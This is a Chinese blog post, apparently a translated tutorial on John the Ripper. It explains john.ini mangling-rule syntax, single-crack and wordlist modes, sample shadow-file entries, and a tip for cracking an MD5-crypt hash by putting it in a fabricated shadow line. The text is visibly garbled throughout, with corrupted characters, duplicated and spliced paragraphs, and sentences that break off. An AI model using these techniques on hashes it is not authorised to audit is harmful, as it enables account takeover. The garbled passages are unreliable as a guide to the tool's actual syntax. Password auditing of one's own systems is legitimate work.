在john.ini中起头为#的行为注释行，程序在遇到此行时自动跳过。  
          1、“:[:cl]”此行表示使用用户名自身作为密码进行尝试，即fool，而“[:cl]”在北３   原字母不变的前提下，首先强制第一个字母大写“c”，其余字母均变为小写“l”，即：Fool,也就是说此行导致john尝试使用fool和Fool两个单词进行解密  
          2、“> 6×06”表示当用户名大于6个字符的时候，从第0个算起，截断至第5个，则共保保留下6个字母，其余丢弃不用。如：用户名为foolers，则会产生如下被尝试的密码：即fooler?
          3、“> 7lx07”和上面相同，此行对于> 7的用户名，截断至7个字母，而且使用“l”强强制使用小写字母?
          4、“> 6/?ulx06”表示对于长度> 6的用户名，截断至6个，强制小写，“/?u”则表示小写字母“u”?
          5、“> 5×05”和上几个例子相同，不用解释了。  
          其余部分自己参考john.ini，具体参数解释如下：  
          john.ini中的每一行均由“条件指令”+“规则指令”组成。  
          1、位于起始部分的“条件指令”：  
          :   表示保持字母不变。  
          > n   表示满足条件的是字符长度   > n   的单词,n的取值范围为0-9。  
          ^x   表示在某单词前部添加字母“x”。  
          $y   表示在某单词尾部加上一个字母“y”。  
          l   强制整个单词全为小写字。  
          u   强制整个单词全为大写字。  
          c   强制单词第一个字为大写(单词的其余部分不受到影响)  
          r   将单词反序排列:如“fool”->   “loof”。  
          d   进行单词加倍:如“fool”   ->   “foolfool”。  
          f   进行单词加倍，后部单词反向写:如“fool”-> “foolloof”。  
          p   以一个字母为限度，在保持单词不变的前提下，尝试单词的所有组成字母的大小写鬃楹希?
          如（“fool”-> “Fool”、“fOol”、“foOl”、“fooL”）。  
          onx   从某单词的第n(由0开始计数)个字母开始，将原来的字母取代为字母“x”。  
          例如：“o1A”则对于“fool”则产生“fAol”。  
          inx   从某单词的第n(由0开始计数)个字母开始，在字母前插入以字母“x”。  
          例如：“i1A”则对于“fool”则产生“fAool”。  
          备注：如果指定的值n> 单词总长度,则相应的插入字符将会添加到单词的尾部。  
          xnm  
          从单词的第n位开始，将单词截成最长度为m个的单词。具体的例子就不列举了，上面乙   经谈过了。  
          2、以下是一些用于字母变化的命令：  
          sxy   字母替换，将某单词中的所有为“x”的字母替换成字母“y”。  
          s?cy  
          用字母“y”来替换单词中的所有包含于“c字母组”中的字母。关于“字母组”下面替讨论?
          @x   删除单词中所有“x”字母。  
          @?c   删除单词中所有包含于“c字母组”中的字母。  
          !y   跳过所有包含含有字母“y”的单词。  
          !?c   跳过所有包含含有“c字母组”中字母的单词。  
          /x   包含字母“x”的单词有效。  
          /?c   包含在“c字母组”中字母的单词为有效。  
          =nx   所有指定位置n的字母为“x”的单词才有效。  
          =n?c   所有指定位置n的字母包含于“c字母组”的单词才有效。  
          备注:和上面一样，起始字母位数从0开始计。  
          3、“字母组”的定义如下:  
          ??   等于字母“?”。  
          ?v   等于所有的元音字母“aeiouAEIOU”。  
          ?c   等于所有的辅音字母“bcdfghjklmnpqrstvwxyzBCDFGHJKLMNPQRSTVWXYZ”。  
          ?w   等于“白色空格”符号:“   ”；  
          （原文的whitespace不晓得如何解释好，好象可以解释为“空格”或者是“EOF结尾符符”。?
          ?p   等于所有标点符号“.,:; ‘ “?!`”。  
          ?s   等于特殊符号“$%^&*()-_+=|\ <> []{}#@/~”。  
          ?l   等于所有26个小写字母(“a”   到   “z”)。  
          ?u   等于所有26个大写字母(“A”   到   “Z”)。  
          ?d   等于10个阿拉伯数字(“0”   到   “9”)。  
          ?a   包括所有26个字母的大小写形式(“a”   到   “z”   +   “A”   到   “Z”)。  
          ?x   包括26个字母大小写+10个阿拉伯数字(“a-z”+“A-Z”+“0-9”)。  
          备注组名可以用大小写的区别来表示“逻辑非”的关系，小写表示肯定，大写表示否抖ā?
          例如:   用?d可以表示“所有数字”,而大写?D就表示“所有非数字的”。  
          4、以下是一些附加的指令：  
          {   单词循环左移一位:   “fool”   ->   “oolf”，当然要左移动两位就表示为“{{”，乙   下同。  
          }   单词循环右移一位:   “fool”   ->   “lfoo”。  
          Dn   删除n位的字母(由0开计)，切开的右面的单词部分自动接上，不会流下空格。  
          P   “crack”   ->   “cracked”,使用单词的过去式，只针对小写单词有效)。  
          G   “crack”   ->   “cracking”,使用单词的现在进行式,同样只针对小写单词有效)。  
          ~i   根据键盘的排列规则，转换为“shift键”+“对应键”所得到的单词，如“12345 ?->  
          “!@#$%”。  
          ~I   进行字母大小写转换，不影响数字及非字母的其他值，如“Fool123”   ->   “fOOL1123”。  
          ~v   将单词中所有元音字母转为小写，如“Crack96”   ->   “CRaCK96”。  
          ~>   根据键盘的排列方式将所有的字母右移一格。  
          例如我们可以看到键盘字母“c”键的右边是“v”键，则“Crack96”   ->   “Vtsvl07 薄?
          ~ <   和上一个一样，不过是左移，如“Crack96”   ->   “Xeaxj85”。  
          5、针对   “single   crack”模式的专用指令  
          专用指令有双字串支援,   控制这些指令要套用指令时需要用到下列的命令:  
          1   对第一个单词的规则  
          2   对第二个单词的规则  
          +   对于完成以上1、2规则变换后所得到的单词再进行其他的变换。  
          (要求“+”必需只用在“1”或“2”之後,   也就是   1+2   或   2+1)  
          （Chinaroot备注：以下一段我不太明白，所以英文照抄，天晓得“GECOS”是什么东挝鳎?@$#$%&%$）  
          If   you   use   some   of   the   above   commands   in   a   rule,   it   will   only   process   word   pairs   (full   names,   from  
          the   GECOS   information),   and   reject   single   words.A   ‘+ ‘   is   assumed   at   the   endd   of   any   rule   that   uses  
          some   of   these   commands,unless   you   specify   it   manually.   For   example,   ’1l2u ‘   will   convert   the   first  
          word   to   lowercase,   the   second   one   to   uppercase,   and   use   the   concatenation   oof   both.   The   use   for   a  
          ‘+ ‘   might   be   to   apply   some   more   commands:   ’1l2u+r ‘will   reverse   the   concatennation   of   both   words,  
          after   applying   some   commands   to   them   separately.  
          (根据本人开始的猜测，估计应该是将规则按你要求的顺序执行，后来发现猜错了，狭  
          首先是shadow部分：  
          root:!2dR3.pEo6#Q:0:1:Super-User:/:/bin/csh  
          foolers:%   dY）.p*12Ver:0:1:AppleUser:/:/bin/csh  
          abc:QkzL@4%68tGHI:201:200::/home1/ahb:/bin/csh  
          最后得到如下两个结果：  
          “1l2u”————“superUSE”、“userSUPE”  
          现在终于明白了，原来此命令只使用shadow中的用户注解名（GECOS）而非用户名，秗  
后超过8位的部分被截断；而“AppleUser”、“ahb”却未被使用。  
          所以基于同样的原理，以下命令可以得到的结果如下：  
          “1l2u+r”———-“RESUrepu”、“REPUSres”。  
          6、批处理规则：  
          你可以使用“[]”来使用一批字符，如“[0-9]”则表示“0-9”这10个数字，你也可乙曰   合使字母列表加批量的格式，如“[aeiou1-9]”则表示包括所有的元音字母+“0-9”十个数字。简单的例子还有“[A-Z]”、“[a-z]”、“[A-Z0-9]”。比?
表示强制使用小写字母，并且在每个字母后面加入“0-9”这十个数字，即：如果用户名为ffool，则john尝试使用fool0、fool1、fool2、……vfool9，尝试进行解密。  
          二、   “Wordlist   Crack ”   模式-即“字典解密模式”  
          1、此解密模式需要用户指定一个字典文件，john读取用户给定的字典文件中的单词尝尝试进行解密。原理是：用户经常使用象hello、superman、computer、…之类的有意义单词作为自己的密码?
          john中自己带了一个字典，文件名为：password.lst，里面包含了一些常被用来作为妹   码的单?。以下给出几个：  
          12345、abc123、passwd、123456、Hockey、asshole、newpass、internet、Maddockⅱcomputer  
          00、Horses、Internet、duck2、Mickey、Cowboys、fiction  
          当然了所带的字典比较小，如果你觉得不够用，可以到ftp://coast.cs.purdue.edu/ppub/dict/里找，可以找到好几十兆的大字典文件。  
          使用方法很简单，假设字典文件名为：password.lst，shadow为shadow.txt，则命令挝?
          john   -word:password.txt   shadow.txt  
          2、和“single  
          —————————————————————————  
          12345、abc123、passwd、123456、Hockey、asshole、newpass、internet、Maddock?
          00、Horses、Internet、duck2、Mickey、Cowboys、fiction  
          —————————————————————————以混合使字母列表加批量的格式，如“[aeiou1-9]”则表示包括所有的元音字母+“0-9”十个数字。简单的例子还有“[A-Z]”、“[a-z]”、“[A-Z0-9]”。比?
          当然了所带的字典比较小，如果你觉得不够用，可以到ftp://coast.cs.purdue.edu/p  
          使用方法很简单，假设字典文件名为：password.lst，shadow为shadow.txt，则命令?
          john   -word:password.txt   shadow.txt  
          2、和“single  
          mode”一样，使用“字典解密模式”时，也可以使用“规则”，具体规则的定义在joh密码的单词。以下给出几个：  
          [List.Rules:Wordlist]部分，以下抽取其中的一小段：  
          ———————————

比如你有一个md5串$1$Ss.NEpuX$diWZjOyRI7CwGkR8QxWur0

那么你可以自己构造一个shadow文件呀
比如
root:$1$Ss.NEpuX$diWZjOyRI7CwGkR8QxWur0:19999:0:999:8:::

然后用john跑就是了

Related Posts

• Ubuntu 和 WIN7 重装后丢失UUID的解决办法(0)
• linux更改密码出现passwd :/usr/share/cracklib/pw_dict: error reading header 错误(0)
• 用linux下迅雷离线下载(2)
• youtube-dl的汉化使用说明(0)
• 如何选择VPS虚拟主机的系统以及版本(2)
• 20个配置安全Nginx Web服务器的方法(0)
• linux下批量下载youtube视频(3)
• TeamViewer for Linux(2)
• 给linux centos 添加第三方源(0)
• 关于Linux使用的真实内存(0)